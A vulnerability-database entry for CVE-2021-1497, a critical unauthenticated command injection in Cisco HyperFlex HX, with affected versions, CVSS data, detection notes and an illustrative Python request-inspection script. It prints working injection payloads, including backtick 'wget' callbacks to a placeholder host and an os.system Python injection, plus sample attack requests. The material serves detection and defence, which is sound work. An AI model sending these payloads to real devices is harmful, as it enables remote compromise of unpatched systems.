cbcvebase.
CVE-2021-1497
published 2021-05-06


Priority: P1 · 98
Severity: critical · 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: KEV · ITW · EXPLOIT
CISA Known Exploited Vulnerability · due 2021-11-17
Exploited in the wild
EPSS: 99.93% (100.0th percentile)

Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. For more information about these vulnerabilities, see the Details section of this advisory.

Affected

4 ranges

| Vendor | Product | Version range | Fixed in |
|--------|---------|---------------|----------|
| cisco | cisco_hyperflex_hx_data_platform | | |
| cisco | hyperflex_hx | | |
| cisco | hyperflex_hx_data_platform | < 4.0(2e) | 4.0(2e) |
| cisco | hyperflex_hx_data_platform | >= 4.5 < 4.5(2a) | 4.5(2a) |

Detection & IOCs (extracted from sources)

url: /auth/change
url: /auth
url: /storfs-asup
command: username=root&password={{url_encode(payload)}}
command: action=&token=`wget http://{{interactsh-url}}`&mode=`wget http://{{interactsh-url}}`
command: 123",""$6$$)); import os;os.system("{{cmd}}");print(crypt.crypt("

  • Monitor for POST requests to /storfs-asup with backtick command substitution in the token or mode parameters (e.g., token=`wget ...` or mode=`wget ...`).
  • The /storfs-asup endpoint is exploited to execute shell commands as the Tomcat user; alert on unauthenticated POST requests to this path.
  • CVE-2021-1497 is a KEV (Known Exploited Vulnerability); prioritize detection and patching on internet-facing Cisco HyperFlex HX management interfaces.
  • The injection payload uses Python crypt/os.system, indicating the vulnerable endpoint processes Python code server-side; detection rules should account for URL-encoded variants of the payload.
  • No authentication is required to exploit these vulnerabilities; perimeter controls blocking unauthenticated access to the management interface are the primary mitigation until patching.
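
One way to implement the checks in the notes above, added here as an example and not taken from the advisory or any vendor tooling. It assumes request bodies are available to the sensor (for instance from a reverse proxy or WAF); the function names, the `has_session` flag and the sample requests are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus
# Shell command substitution (backticks or $(...)), per the token/mode note above.
SHELL_SUBST = re.compile(r"`|\$\(")
# Python fragments from the credential-field payload listed under the IOCs.
PY_INJECT = re.compile(r"os\.system\s*\(|crypt\.crypt\s*\(|\bimport\s+\w+")

def fully_decode(value, max_rounds=3):
    """Undo nested URL-encoding so %2560 and %60 both become a backtick."""
    for _ in range(max_rounds):
        value, previous = unquote_plus(value), value
        if value == previous:
            break
    return value

def form_fields(body):
    """Split on raw '&' before decoding so an encoded '&' stays inside its value."""
    fields = {}
    for pair in body.split("&"):
        key, _, raw = pair.partition("=")
        fields[fully_decode(key)] = fully_decode(raw)
    return fields

def inspect_request(method, path, body, has_session=False):
    """Return findings for one HTTP request to the management interface."""
    if method.upper() != "POST":
        return []
    route = path.split("?", 1)[0].rstrip("/")
    fields = form_fields(body)
    findings = []
    if route == "/storfs-asup":
        if not has_session:
            findings.append("unauthenticated POST to /storfs-asup")
        for name in ("token", "mode"):
            if SHELL_SUBST.search(fields.get(name, "")):
                findings.append(f"command substitution in {name}")
    elif route in ("/auth", "/auth/change"):
        for name in ("username", "password"):
            if PY_INJECT.search(fields.get(name, "")):
                findings.append(f"python code in {name}")
    return findings

# Constructed sample requests (method, path, body); not captured traffic.
SAMPLES = [
    ("POST", "/storfs-asup", "action=&token=%60id%60&mode=ok"),
    ("POST", "/storfs-asup/", "action=&token=abc&mode=%2560id%2560"),
    ("POST", "/auth", "username=root&password=x%22%29%3Bimport+os%3Bos.system%28%22id%22%29"),
    ("POST", "/auth", "username=admin&password=Correct-Horse-9"),
]
```

Calling `inspect_request(*sample)` on each entry of `SAMPLES` flags the first three and returns an empty list for the ordinary login; the second entry is double-encoded and is only caught because of the repeated decoding.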

CVSS provenance

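| Source | CVSS version | Score | Severity | Vector |
|--------|--------------|-------|----------|--------|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C |
| vulncheck | | 9.8 | CRITICAL | |
| cisa | | 9.8 | CRITICAL | |
| vendor_cisco | | 9.8 | CRITICAL | |
| vendor_redhat | | 5.5 | MEDIUM | |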